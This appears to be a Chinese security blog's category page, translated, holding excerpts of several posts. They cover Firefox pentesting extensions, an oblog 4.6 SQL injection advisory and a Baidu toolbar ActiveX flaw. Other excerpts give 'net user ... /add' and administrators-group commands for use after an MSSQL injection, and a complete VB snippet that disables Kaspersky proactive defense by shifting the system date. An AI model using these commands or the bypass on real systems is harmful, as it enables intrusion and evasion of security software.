Posts in the category 'Technical Articles'
Hacking Web 2.0 Applications with Firefox
Source: securityfocus
Introduction
AJAX and interactive web services form the backbone of “web 2.0” applications. This technological transformation brings about new challenges for security professionals. This article looks at some of the methods, tools and tricks to dissect web 2.0 applications (including Ajax) and discover security holes
Read more »
Tags: Firefox, Hacking, Web 2.0
Turning Firefox into a Penetration Testing Platform
Source: NOSEC
Origin:http://www.security-database.com/toolswatch/Turning-Firefox-to-an-Ethical.html
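This document is really interesting; it mentions a number of security-related Firefox extensions. There are some I particularly like, such as Shazou, which looks up the region an IP address is located in; very cool. There are also several cookie-related extensions and HackBar, which makes encoding convenient, and SpiderZilla is good too. A couple more of these and security companies will be out of business, heh. I recommend that anyone using Firefox give them a try.
Here I will also add one more, Firebug, which is mentioned in the article Hacking Web 2.0 Applications with Firefox. ; )
The original text follows:
The Internet is an amazing virtual world where you can "virtually" do anything: gambling, playing, watching movies, shopping, working, “VoIPying”, spying on other people and, for sure, auditing remote systems.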
This article is copyrighted Security-Database.com
The security testers community has a large panel of security tools, methodologies and much more to perform their pentests and audit assessments. But what happens if you find yourself weaponless?
No more Top 100 security tools, no more LiveCDs and no more exploitation frameworks. A security auditor without a toolbox is like a cop without a gun.
Nevertheless, there may be a way to rescue yourself from this nightmare situation.
The magical solution could be Firefox and its extensions developed by ethical hackers and coders.
This article comes as an update to what we posted previously about how to turn your Firefox into more than a simple browser. It was about application auditing.
This article has been updated to a new framework. The tool is called FireCAT, and it is a mind-map-based tool. Get it here.
Here is an updated list of useful security auditing extensions :
Information gathering
- Whois and geo-location
  - ShowIP: Shows the IP address of the current page in the status bar. It also allows querying custom services by IP (right mouse button) and hostname (left mouse button), like whois, netcraft.
  - Shazou: Shazou (pronounced "Shazoo"; it is Japanese for mapping) enables the user to map and geo-locate, with one click, any website they are currently viewing.
  - HostIP.info Geolocation: Displays geolocation information for a website using hostip.info data. Works with all versions of Firefox.
  - Active Whois: Starts Active Whois to get details about any website owner and its host server.
  - Bibirmer Toolbar: An all-in-one extension, but auditors need to play with the toolbox. It includes WhoIs, DNS Report, Geolocation, Traceroute and Ping. Very useful for the information gathering phase.
- Enumeration / fingerprinting
  - Header Spy: Shows HTTP headers on the status bar.
  - Header Monitor: A Firefox extension that displays in the status bar panel any HTTP response header of the top-level document returned by a web server. Examples: Server (by default), Content-Encoding, Content-Type, X-Powered-By and others.
- Social engineering
  - People Search and Public Record: This Firefox extension is a handy menu tool for investigators, reporters, legal professionals, real estate agents, online researchers and anyone interested in doing their own basic people searches and public record lookups as well as background research.
- Googling and spidering
  - Advanced dork: Gives quick access to Google’s Advanced Operators directly from the context menu. This could be used to spider a site or scan for hidden files (this spider technique is used via scroogle.org).
  - SpiderZilla: Spiderzilla is an easy-to-use website mirror utility, based on Httrack from www.httrack.com.
  - View Dependencies: View Dependencies adds a tab to the "page info" window, in which it lists all the files that were loaded to show the current page (useful for a spidering technique).
Security Assessment / Code auditing
- Editors
  - JSView: The "view page source" menu item now opens files based on the behavior you choose in the jsview options. This allows you to open the source code of any web page in a new tab or in an external editor.
  - Cert Viewer Plus: Adds two options to the certificate viewer in Firefox or Thunderbird: an X.509 certificate can either be displayed in PEM format (Base64/RFC 1421, opens in a new window) or saved to a file (in PEM or DER format, and PKCS#7 provided that the respective patch has been applied – cf.
  - Firebug: Firebug integrates with Firefox to put a wealth of development tools at your fingertips while you browse. You can edit, debug, and monitor CSS, HTML, and JavaScript live in any web page.
  - XML Developer Toolbar: Allows XML developers to use standard tools, all from the browser.
- Headers manipulation
  - HeaderMonitor: A Firefox extension that displays in the status bar panel any HTTP response header of the top-level document returned by a web server. Examples: Server (by default), Content-Encoding, Content-Type, X-Powered-By and others.
  - RefControl: Control what gets sent as the HTTP Referer on a per-site basis.
  - User Agent Switcher: Adds a menu and a toolbar button to switch the user agent of the browser.
- Cookies manipulation
  - Add N Edit Cookies: Cookie editor that allows you to add and edit "session" and saved cookies.
  - CookieSwap: CookieSwap is an extension that enables you to maintain numerous sets or "profiles" of cookies that you can quickly swap between while browsing.
  - httpOnly: Adds httpOnly cookie support to Firefox by encrypting cookies marked as httpOnly on the browser side.
  - Allcookies: Dumps ALL cookies (including session cookies) to Firefox's standard cookies.txt file.
- Security auditing
  - HackBar: This toolbar will help you in testing SQL injections, XSS holes and site security. It is NOT a tool for executing standard exploits and it will NOT teach you how to hack a site. Its main purpose is to help a developer do security audits on his code.
  - Tamper Data: Use tamperdata to view and modify HTTP/HTTPS headers and post parameters.
  - Chickenfoot: Chickenfoot is a Firefox extension that puts a programming environment in the browser’s sidebar so you can write scripts to manipulate web pages and automate web browsing. In Chickenfoot, scripts are written in a superset of JavaScript that includes special functions specific to web tasks.
Proxy/web utilities
- FoxyProxy: FoxyProxy is an advanced proxy management tool that completely replaces Firefox’s proxy configuration. It offers more features than SwitchProxy, ProxyButton, QuickProxy, xyzproxy, ProxyTex, etc.
- SwitchProxy: SwitchProxy lets you manage and switch between multiple proxy configurations quickly and easily. You can also use it as an anonymizer to protect your computer from prying eyes.
- POW (Plain Old WebServer): The Plain Old Webserver uses Server-side JavaScript (SJS) to run a server inside your browser. Use it to distribute files from your browser. It supports Server-side JS, GET, POST, uploads, Cookies, SQLite and AJAX. It has security features to password-protect your site. Users have created a wiki, chat room and search engine using SJS.
Misc
- Hacks for fun
  - Greasemonkey: Allows you to customize the way a webpage displays using small bits of JavaScript (scripts can be downloaded here).
- Encryption
  - Fire Encrypter: FireEncrypter is a Firefox extension that gives you encryption/decryption and hashing functionality right from your Firefox browser, mostly useful for developers or for education & fun.
- Malware scanner
  - QArchive.org web files checker: Allows people to check web files for any malware (viruses, trojans, worms, adware, spyware and other unwanted things) inclusions.
  - Dr.Web anti-virus link checker: This plugin allows you to check any file you are about to download or any page you are about to visit.
  - ClamWin Antivirus Glue for Firefox: This extension scans every downloaded file automatically with ClamWin.
- Anti Spoof
  - refspoof: Makes it easy to pretend to originate from a site by overriding the URL referrer (in an HTTP request). It provides this feature through the pseudo-protocol spoof://, so the information can be stored in a "hyperlink" that can be used in any context, such as HTML pages or bookmarks.
Besides, we keep watching for new extensions and we are on the way to developing a new extension for Nmap and Nessus. So keep watching us.
Feel free to send us (info[at]security-database[dot]com) any useful information about security and audit oriented Firefox extensions.
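Injection vulnerability in oblog commercial edition 4.6, direct administrator takeover
Affected version: 4.6 commercial edition
Discovered by: 雕牌
Source: http://52cmd.cn
Vulnerability description:
By constructing a specific statement, the password of any user, including the administrator, can be changed; a critical-severity vulnerability.
Vulnerable file: AjaxServer.asp
Variable: log_files
Statement: log_files=Replace(log_files," ","")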
If Left(log_files,1)="," Then log_files=Right(log_files,Len(log_files)-1)
rs("logpics") = log_files
'Attachment file handling
If log_files <>"" Then
oblog.Execute "Update oblog_upfile Set logid="
Read more »
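Adding a System User Without net.exe and net1.exe
Note from 鬼仔: an old article; I had not posted it before.
Source: hackest[H.S.T]
Everyone knows that on Windows a user can be added from CMD with the net command
The format is: net user username password /add
This adds a user with the user name username and the password password
To add the user to the administrators group as well, the following command can be used
net localgroup administrators username /add
This adds the user named username to the administrators group
But without net.exe and net1.exe, is it impossible to add a system user?
The answer is no!
Suppose we have an MSSQL injection point with SA privileges
3389 is open and allows login connections
Arbitrary commands can be executed through an injection tool
But the administrator has renamed or simply deleted net.exe and net1.exe
Read more »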
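Bypassing Kaspersky Proactive Defense in a Few Lines
Note from 鬼仔: this again uses changing the system time to make Kaspersky stop working. Reportedly, though, Kaspersky will fix this issue in its next version.
Author: 雪狐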
Private Sub Form_Load()
Date = Date - 5000
End Sub
Private Sub Timer1_Timer()
Date = Date + 5000
End
End Sub
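Just a few simple lines; set the timer to 15 seconds!
After the program runs, the date is set to the correct date minus 5000 days, and then after 15 seconds 5000 days are added back, restoring the original time!
Kaspersky stops protecting during those 15 seconds!!
Heh
Very satisfying; far better than the bat-script versions circulating online!
Tags: Kaspersky
Reversing the Lianzhong (联众) Password Algorithm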
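//Author: 姜堰市合作银行 - 姚佩云 www.jynx.com.cn [email protected]
//First published on the 大富翁论坛 (www.delphibbs.com) blog; when reposting, please respect the author's work and keep this notice
With nothing much to do, I log in to Lianzhong every day. Lianzhong's password is encrypted and then stored in the local registry, so I took a look at how it is encrypted. I downloaded ollydbg, traced all the way through, and found that the algorithm is extremely simple. Here is a Delphi version of the decryption algorithm (anyone interested in the encryption part is welcome to discuss it). The algorithm is rather rough; could someone help optimize it :)
Read more »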
Baidu Soba (百度超级搜霸) Remote Code Execution Vulnerability
by cocoruder(frankruer_at_hotmail.com)
http://ruder.cdut.net
Summary:
Baidu Soba is a free browser toolbar produced by Baidu that provides Baidu's various services. For more information, see:
http://bar.baidu.com/sobar/promotion.html
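An ActiveX control in Baidu Soba contains a remote code execution vulnerability. A remote attacker can exploit it to execute arbitrary code on the victim's system with the privileges of the current browser, and can then install trojans and spyware.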
Affected Software Versions:
Baidu Soba 5.4 (Version of "BaiduBar.dll" is 2.0.2.144)
Details:
Read more »